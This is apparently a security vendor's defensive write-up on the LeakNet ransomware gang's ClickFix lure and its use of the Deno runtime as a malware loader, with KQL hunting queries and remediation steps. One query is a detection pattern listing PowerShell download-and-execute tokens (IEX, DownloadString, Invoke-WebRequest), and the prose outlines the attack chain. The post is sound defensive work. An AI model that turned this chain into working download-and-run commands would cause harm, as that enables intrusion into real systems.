Defending Against LeakNet: Detecting ClickFix Attacks and Malicious Deno Runtime Usage

The cybersecurity landscape is constantly evolving, and threat actors are increasingly combining social engineering with legitimate development tools to bypass defenses. A recent example is the LeakNet encryption-based cyber incident gang, which has adopted the "ClickFix" technique for initial access and utilizes the Deno runtime as a stealthy malware loader. For IT and security teams, understanding this hybrid approach is critical to maintaining a robust security posture.

Introduction

The LeakNet gang represents a growing trend of threat actors who leverage "living-off-the-land" (LotL) tactics. Instead of relying solely on custom malware, they are abusing legitimate software—in this case, the Deno runtime for JavaScript and TypeScript—to execute malicious code on victim networks.

This attack vector is particularly dangerous because it combines two distinct risks:

1. ClickFix: A social engineering technique that tricks users into executing malicious commands via fake browser error messages or "update" prompts.
2. Deno Runtime: A legitimate, signed application that security tools often trust, making it an effective cloak for malicious loaders.

Defenders must understand that traditional antivirus signatures may miss these attacks because the core payload executes within a trusted framework. Proactive threat hunting and strict application controls are essential to stop these threats before encryption occurs.

Technical Analysis

The attack chain observed in recent LeakNet incidents follows a multi-stage process designed to evade detection:

• Initial Access (ClickFix): The attack begins when a user lands on a compromised or malicious website. They are presented with a fraudulent browser error message (often mimicking Cloudflare or browser updates) claiming a network failure or verification error. The prompt instructs the user to run a specific "repair" command, which is actually a malicious PowerShell script.

• Payload Delivery (Deno Runtime): Once the user executes the command, a malicious script is downloaded. Unlike traditional malware that might download a .exe directly, this script retrieves and installs the Deno runtime. Deno is a secure runtime for JavaScript and TypeScript, similar to Node.js, but with improved security defaults by design.

• Execution: The attackers use Deno to run a malicious JavaScript or TypeScript loader. Because Deno is a legitimate development tool, its execution often bypasses basic heuristic filters. The loader then establishes communication with command-and-control (C2) servers and prepares the environment for the encryption payload.

Affected Systems & Severity:

• Affected Systems: Windows-based environments using standard web browsers (Chrome, Edge, Firefox). The Deno runtime can run on Windows, Linux, and macOS, though these specific campaigns are primarily targeting Windows enterprise users.
• Severity: High. This technique grants attackers full code execution capabilities on the endpoint.

Defensive Monitoring

Detecting LeakNet activities requires monitoring for the unusual execution of the Deno runtime in enterprise environments and the specific PowerShell patterns associated with ClickFix. Below are KQL queries for Microsoft Sentinel/Defender to help identify suspicious activity.

1. Detecting Deno Execution (Unusual Process)

Most corporate environments do not use the Deno runtime for daily operations. Its presence on a standard endpoint is a high-fidelity indicator of compromise (IOC).

DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName has "deno.exe"
| project DeviceName, AccountName, FolderPath, ProcessCommandLine, InitiatingProcessFileName
| order by Timestamp desc

2. Hunting for ClickFix PowerShell Patterns

ClickFix attacks often involve users copying and pasting commands or running PowerShell scripts that download content from the internet. This query looks for PowerShell commands that download files (a common step in deploying the Deno loader).

DeviceProcessEvents
| where Timestamp > ago(24h)
| where FileName in~ ("powershell.exe", "pwsh.exe")
| where ProcessCommandLine contains "Invoke-WebRequest" or ProcessCommandLine contains "IEX" or ProcessCommandLine contains "DownloadString"
| where ProcessCommandLine contains "http"
| project DeviceName, AccountName, ProcessCommandLine, InitiatingProcessFileName
| limit 100

3. Monitoring for Script Files Executed via Deno

Deno typically runs .js or .ts files. We can look for process creation events where Deno is the parent process.

DeviceProcessEvents
| where Timestamp > ago(7d)
| where InitiatingProcessFileName has "deno.exe"
| project DeviceName, FileName, ProcessCommandLine, InitiatingProcessCommandLine

Remediation

To protect your organization against LeakNet and similar ClickFix/Deno attacks, Security Arsenal recommends the following actionable steps:

1. Application Allowlisting: Implement strict allowlisting policies (e.g., Microsoft Defender Application Control or AppLocker). If your organization does not develop software using JavaScript/TypeScript, explicitly block the execution of deno.exe and similar runtime environments like node.exe on user endpoints.

2. User Education and Awareness: Train employees to recognize social engineering tactics. specifically the "ClickFix" technique. Users should be instructed to:

   • Never run commands from browser pop-ups claiming to be error codes or network fixes.
   • Report IT support requests that originate from web pages immediately.

3. Restrict PowerShell Usage: Enforce Constrained Language Mode for non-administrative users to prevent the execution of complex scripts often used in these attacks.

4. Web Filtering: Configure secure web gateways to block access to known malicious domains and IP addresses associated with LeakNet infrastructure. Filter endpoints that allow unauthorized downloads of executable files.

5. Patch Management: Ensure browsers and operating systems are up to date. While this attack abuses functionality rather than a specific vulnerability, updated browsers often include improved fraud and phishing protection features.

Related Resources

Security Arsenal Incident Response Services AlertMonitor Platform Book a SOC Assessment incident-response Intel Hub